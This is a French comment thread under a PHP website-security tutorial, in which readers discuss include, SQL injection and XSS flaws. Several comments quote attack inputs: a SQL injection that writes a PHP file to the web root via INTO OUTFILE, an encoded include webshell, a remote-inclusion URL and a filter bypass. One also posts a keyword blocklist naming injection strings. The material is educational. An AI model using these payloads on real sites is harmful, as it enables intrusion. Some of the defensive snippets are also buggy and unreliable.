COMMENT SÉCURISER SON SITE ET ÉVITER LES FAILLES PHP ?

Commentaire de juliiian le 27/07/2005 17:27:42

Je m'occuperais de le rajouter aujourd'hui, je suis sans doute passé à côté de pas mal de choses, mais ça représente un boulot assez conséquent..

Commentaire de MadM@tt le 11/08/2005 17:08:10

Je m'attendais à un tutoriel qui allait me servir, et je suis vraiment déçu.
Je ne comprend que les titres, alors que les failles que tu énonce je les connais déjà toutes...
Rien que le chapitre 8, c'est meme pas la peine qu'un newbie le lise, il va rigoler. Enfin il te reste encore pas mal de boulot avant de pouvoir monter un bon tutoriel, surtout que la moitié des mots ne sont pas séparés par des espaces.
Enfin voilà, je nétait pas venu sur cette page pour critiquer mais pour apprendre, mais je n'ai pas eu le choix...

Commentaire de MadM@tt le 24/08/2005 23:41:18

chevilles qui gonflent ?

bah je dis pas du tout que j'aurais pu faire mieux moi, parce que je suis venu ici pour chercher des infos quoi, mais je suis déçu parce que je connais les failles de nom (hein seulement de nom ;) c'est peut etre pour cette phrase que tu m'as fait la remarque) mais je voulais justement en savoir plus...
Enfin voilà pour moi quand on poste un tutoriel, c'est qqch qu'on a travaillé et qui pourrait servir aux autres, ce qui n'est pas trop le cas à mes yeux, j'y ai rien pigé, les phrases n'ont ni queue ni tete, il utilise des termes assez compliqué qu'il ne définit pas... Faut un avoir un bon niveau avant de le lire et c'est pas précisé

bon bon j'arrete de parler lol et désolé si j'ai paru "prétentieux" ou autre ;)

Commentaire de MadM@tt le 27/08/2005 00:27:39

Bah j'ai pas trop le temps de tout expliquer en détail

Par exemple, au 2 :
"CODE
If ($password != "Pouletgrille")  { print''; }

Pourquoi? Que va il se passer quand le "piratin" va rentrer un mauvaismot depasse ? Il va arriver sur votre page non protégée, et va êtreaussitôtredirigé vers une page d'erreur, et c'est là l'erreur : Levisiteurpourra toujours bloquer son navigateur, ou enregistrer votrepage, et ilvera l'intégralité de votre page "protégée", et pourra yaccomplir sesméfaits."

J'ai pas compris : C'est quoi ma page non protégée ? C'est celle ou on demande l'authentification, celle qui contient notre contenu reservé aux membres ?
"et va êtreaussitôtredirigé vers une page d'erreur" > Pourquoi donc ? d'après le bout de code que je vois, si on entre un mauvais mot de passe la seule chose qui se passe, c'est que rien ne s'affiche c'est tout...
Enfin en résumé je n'ai pas compris ta faille ? ou plutot l'exemple de ta faille
De plus le code "sécurisé" possède une erreur je crois ?
If($password != "Pouletgrille")  { Print'Insérez ici le contenudevotre section admin'; } else { print'Erreur de connexion !'; }
ça serai pas plutot :
If($password == "Pouletgrille")  { Print'Insérez ici le contenudevotre section admin'; } else { print'Erreur de connexion !'; }
Mais bon ça se comprend quand meme


Au 3 il manque le bout de code présentant la faille.
MAis bon perso cette faille je la connais, mais qqn qui ne la connais pas (et qui viens ici pour la découvrir) ne comprendra pas. (toutefois l'explication sur les adresse plus bas permet de deviner)


Au 4, le code c'est Salut!, bizarre pour un code php ;)
Enfin si on ne devine pas, aucun moyen de savoir de quelle faille tu parle, tu dis seulement ce qu'on peut faire grace à elle.


Le 5 : nickel ;)


Au 6 : j'ai pas compris pourquoi "si on url encode ' en %27 pui reurlencoder en %2527" > "on peut injecter un ' au nez de la requete :) et donc injecter du code php."
Je vois pas le lien entre les 2
Et puis que faire ? j'ai pas trop compris mais bon c'est peut etre pas de mon niveau


7 : Le code :
1' OR 1=1 INTO OUTFILE "/var/www/htdocs/site/kikoo.php" FIELDS TERMINATED BY ''/*
C'est quoi ? du mySql ?
"ethop on se fabrique une include a condition de connaitre le pathrelatifdu wwwroot pouvant etre reperé en faisant bugger la page."  ?? ça sert à quoi de faire ça ? C'est la faille ou c'est la sécurité ?
Et ça ça vient d'ou : %3C%3Finclude%28%24p%29%3Bexit%3B%3F%3E


8 :
"Premiere chose compiler le LAMP avec le mod ssp de gcc"
je fais du php depuis qq mois, mais je ne connais tjrs pas les mots LAMP, mod ssp et gcc, je suis si nul que ça ou ces mots vaudraient peut etre la peine d'etre expliqué :(
Après on peux faire une collection :
chrooter, symlink, sock mysql, chroot, mod_php, les binaires, le param execdir, system()/passthru/exec etc, les url open...
Je suis pas du tout expert, mais chu pas newbie à ce point non plus...


Pas contre le 9 j'adore lol ;)
Et merci pour les espaces

Commentaire de juliiian le 27/08/2005 08:52:45

Pourquoi, lors de l'envois de mon texte le site me zap systématiquement des espaces ?

Sinon, la pluspart des problèmes que tu décris sont des problèmes de copier coller (mon tutorial ayant été écrit sous un logiciel de mise en page, certains caractère ou phrases n'ont pas été pris en compte (presque tous les codes par exemple, cela doit venir de leur police), je pense les avoir corriger.

Je vais éclaircir les deux derniers points serieux (le 7 et  le 8), n'étant pas de moi, je ne les ai pas contrôlés comme ils auraient dû l'être.

Commentaire de MadM@tt le 27/08/2005 11:36:00

Ok merci

Commentaire de MadM@tt le 04/09/2005 11:56:52

J'ai relu le tutoriel entièrement, et franchement c'est excellent, j'ai réussi à comprendre ttes les failles ^^
Vraiment euh ça mériterais qu'on efface mes commentaires précédents vu les efforts que tu as fait. Enfin tt simplement bravo !

Commentaire de mickadevelop le 27/10/2005 16:13:50

Bonjour,
Merci pour ce tutoriel très interessant!!
J'ai une petite question qui me vient concernant le point numéro 2.
Pour des pages membres ou admin si on utilise le code suivant est ce que cela peu fonctionner au niveau de la sécurité?
exemple:
<?php
if($motdepasse != "pouletgrille")
   {
   headers('location: pageprecedente.php');
   exit();
   }
?>
<html>
<p>contenu page membre</p>
En théorie le serveur lit le code php si le mot de passe est correcte la partie html est renvoyée à l'internaute sinon le programme renvoi à la page précedente et stoppe l'éxecution au niveau du "exit()" donc en théorie la partie html n'est pas accessible. Pourriez vous me dire ce que vous en pensez? Merci d'avance.

Commentaire de mickadevelop le 27/10/2005 16:22:05

Bonjour,
Merci pour ce tutoriel très interessant!!
J'ai une petite question qui me vient concernant le point numéro 2.
Pour des pages membres ou admin si on utilise le code suivant est ce que cela peu fonctionner au niveau de la sécurité?
exemple:
<?php
if($motdepasse != "pouletgrille")
   {
   headers('location: pageprecedente.php');
   exit();
   }
?>
<html>
<p>contenu page membre</p>
En théorie le serveur lit le code php si le mot de passe est correcte la partie html est renvoyée à l'internaute sinon le programme renvoi à la page précedente et stoppe l'éxecution au niveau du "exit()" donc en théorie la partie html n'est pas accessible. Pourriez vous me dire ce que vous en pensez? Merci d'avance.

Commentaire de ccharlly le 25/02/2006 14:02:30

Bonjour à toutes et à tous,

Je suis profane et je souhaite utiliser un CMS " NPDS " par exemple : ce portail, dans ses dernières versions, tient-il compte de toutes ces failles potentielles ?

Merci d'avance

Commentaire de MadM@tt le 27/02/2006 13:24:55

Quand on a un peu de cerveau et qu'on veut critiquer on regarde tous les commentaires.
Voici mon dernier puisqu'il n'a pas l'air de s'afficher chez toi :
"J'ai relu le tutoriel entièrement, et franchement c'est excellent, j'ai réussi à comprendre ttes les failles ^^
Vraiment euh ça mériterais qu'on efface mes commentaires précédents vu les efforts que tu as fait. Enfin tt simplement bravo !"


Mes premiers commentaires ont été écrit pour un tutoriel qui n'avait rien à voir avec celui d'aujourd'hui (qui est très bien soit dit en passant) car il était incomplet et pas très compréhensible.
Donc "fais plus chier please"
Ciao

Commentaire de jdalton42 le 06/03/2006 14:30:05

wai... j'ai pas lu tout les commentaires... pcq j'en avais marre de lire tes critiques...

Commentaire de pastis51forever le 28/05/2006 00:19:28

Bonjour!

Peut-etre que je me trompe...
Enfin, je me lance...
Dans ta solution a la 3eme faille (include()), tu dis que c'est pas grave d'inclure un fichier php... Mais je reste sceptique sur ce sujet.
Je veux bien que le code s'execute sur son serveur d'abord, puis sur le tien, j'ai pas vérifié. Dans ce cas la, si son code est:
<?php
echo '<?php unlink("index.php") ?>';
?>
si son but (tout gentil, il faut le dire...) est uniquement de détruire ton index.php pour, j'imagine, voir les liste des fichier... Avec de plus mauvaises intentions, je pense qu'il peut s'amuser beaucoup plus en incluant tout ce qu'il veut par la même technique...

J'espère n'avoir pas dit de conneries...

Brice

Commentaire de pastis51forever le 31/05/2006 10:47:06

Salut Killermaster!
Juste une idée qui n'est qu'une idée par rapport à ta solution de preg_replace:
Je pense que ca ne suffit pas car si le gars rentre cette adresse la:
...?page=http:/http://www./www.sonsitepascool.com/sapagepascoolnonplus.php, le preg_replace supprimera http://www., et ce qu'il restera dans la variable $page sera http://www.sonsitepascool.com/sapagepascoolnonplus.php, donc le chemin direct vers sa page.
Soit tu devrais en faire un fonction récursive pour les supprimer tant qu'il en reste dans la variable, soit, plus simple, tu testes uniquement la présence de la chaine http://www dans $page. Avec un simple if, soit tu inclus la page, soit tu mets un message d'erreur avec en plus la possibilité de faire un log contenant l'ip du gars en question (Que tu pourras par la suite interdire dans le .htaccess).
C'est pourquoi, le mieux et donc de créer une fonction de test de ta variable $page dès le début du code pour permettre de le relancer vers une autre page en cas de tentative d'inclusion de fichiers non autorisés.
Et ta fonction peut aussi vérifier si $page inclut bien un fichier autorisé (par exemple issu des répertoires include/ ou fonction/...)

Brice

Commentaire de NKWolf le 04/06/2006 12:57:46

félicitation pour ce tuto, j'aime beaucoup même si je connais déjà ces failles.

par contre il serais bien de parler de la fonction addslashes qui sécurise un chouya plus un site

en suite y'a ceci pour empêcher d'introduire du javascript par l'utilisateur / visteur

<?PHP
// On récupère la partie de l'url actuel après le ?
// exemple http://www.mon-site.com/index.php?zone=news&id_news=1
// on récupère alors dans $str_queryurl : zone=news&id_news=1
$str_queryurl = strtolower(rawurldecode($_SERVER['QUERY_STRING']));

// On crée notre tableau contenant des éléments interdit
$str_no = array("%20union%20", "/*", "*/union/*",
                "+union+", "load_file", "outfile",
                "document.cookie", "onmouseover",
                "<script", "<iframe", "<applet",
                "<meta", "<style", "<form", "<img",
                "<body", "<link");

// On fait la boucle sur notre tableau
foreach ($str_no as $str_value)
{
    // Si un élément interdit est présent dans l'url    
    if (strpos($str_queryurl, $str_value))
    {
// On redirige vers une page d'erreur
header("Location : page_erreur.php");
// Ceci est facultatif mais offre une sécurité de plus, on est jamais trop prudent
// on utilise exit pour stoper l'exécution du script
exit();
    }
}
?>

voici une solution concrète de sécurité, il ne vous reste plus qu'a l'appliquer à des valeur $_POST[], $_GET[], $_COOKIE[] aussi pourquoi pas

il aurais été bien aussi je pense, puisque ce tuto est destiné aux débutants, de leur préciser de vérifier chaque variable passer dès que c'est fesable

en ce qui concerne l'include qui est une faille de sécurité très connu pour ceux qui passe le nom complet du fichier (fichier.php); pour sécuriser celà il peut être judicieux de placer un suffixe, de ne pas mettre l'extension dans la variable mais en brute dans la source
exemple

<?PHP
// nom du fichier
$page = "fichier";

// ici on vérifie que l'utilisateur n'essaye pas de mettre des \. qui permetrai de remonter de répertoire
if(ereg("\.\.", $page))
{
    // On redirige vers une page d'erreur
    header("Location : page_erreur.php");
    // Ceci est facultatif mais offre une sécurité de plus, on est jamais trop prudent
    // on utilise exit pour stoper l'exécution du script
    exit();
}
// et pour plus de sécurité encore on met la suite dans le else, Si l'erreur survient cette partie n'est pas interpreter
else
{
    // Si le fichier existe sur le serveur    
    if(is_file("rep/z" . $page . ".php"))
    {
        // la suite de votre script
    }
    // Sinon c'est qu'il n'existe pas
    else
    {
       echo "Erreur 404 : fichier introuvable";
    }
}
?>
voilà ici include n'a que un élément modifiable c'est le nom du fichier, notre préfixe est z et nous définissons nous même l'extension du fichier, ce qui nous donne en réalité :
include("rep/zfichier.php");

vilà c tout ce que j'avais à dire pour l'instant j'ai vue un ou 2 autre truc mais plus le temps lol

en tout cas GG le tuto

Commentaire de kankrelune le 08/06/2006 14:18:47

@ NKWolf... strip_tags()... .. ?

@ tchaOo°

Commentaire de AzertyH le 20/09/2006 14:01:22

Salut,

Je suis débutant en matière de site web dynamique, et j'essai d'apprendre une manière de programmer tout en tennant compte des failles possible.
Mais franchement malgrès ce tuto, je galère grave... Si quelqu'un pouvez m'aider je lui en serai très reconnaissant.

1 ) Dans la faille n°1, je me demande si on peut utiliser la méthode POST en toute sécurité, ou est-ce que cette méthode est aussi risqué de GET en faveur des piratins. Si oui, alors je comprendrais qu'il faut utiliser les variables de session.
D'autre part, est'ce que les variables de session sont entièrement sécurisé.

2) Malgrès la simplicité de ce qui a put être dit dans la faille 2, je ne comprend pas clairement cette faille. Pouvez-vous exposer de manière complète tous éléments mis en oeuvre pour cette faille. J'ai absolument besoin de comprendre.


Déjà si j'arrive à comprendre ça, je serais un peu plus rassuré.
Merci pour votre aide

Commentaire de winsion le 25/09/2006 14:15:13

[QUOTE]$page=preg_replace("/[^a-z0-9_ ]/i", "", $page);
if(!@include("includes/$page.php"))die("Cette page n'existe pas sur le serveur, merci d'informer le webmaster du site si ce problème venait à se reproduire.");

Normal que ca ne marche pas chez moi, je dois remplacer quoi chez moi, en sachant que c'est menu.php que je veux include ?[/QUOTE]

Pareil pour moi !!!! pouvez vous faire un exemple ??

Commentaire de AzertyH le 04/10/2006 01:14:20

Merci pour ta réponse Winsion. J'ai compris quelques truck depuis la dernière foi, mais bonjour la galère et le temps passé sur les nombreux forums et tutos.
Afin de contrer une faille de type include j'ai trouvé une solution plus pratique et facile:
Dans php.ini, configurer le paramettre suivant : alloow_url_fopen=off
ceci a pour but d'interdire l’ouverture de fichiers distants de type :
http://www.votresite.com/index.php?page=http://www.sitepirate.com/

Pouvez vous me dire si cette mettode corrige bien ce problème?
Merci

Commentaire de DreamPush le 16/03/2007 00:13:46

Bonjour,

Je sais, ce tutorial date de 2005. Mais c'est bien bête qu'en particulier la partie 7 "La faille require() par Savory" soit dite en refonte c'est-à-dire absente : elle m'aurait bien intéressée...

Dans tous les cas, excellent tutorial ! Merci et Bon code à tous.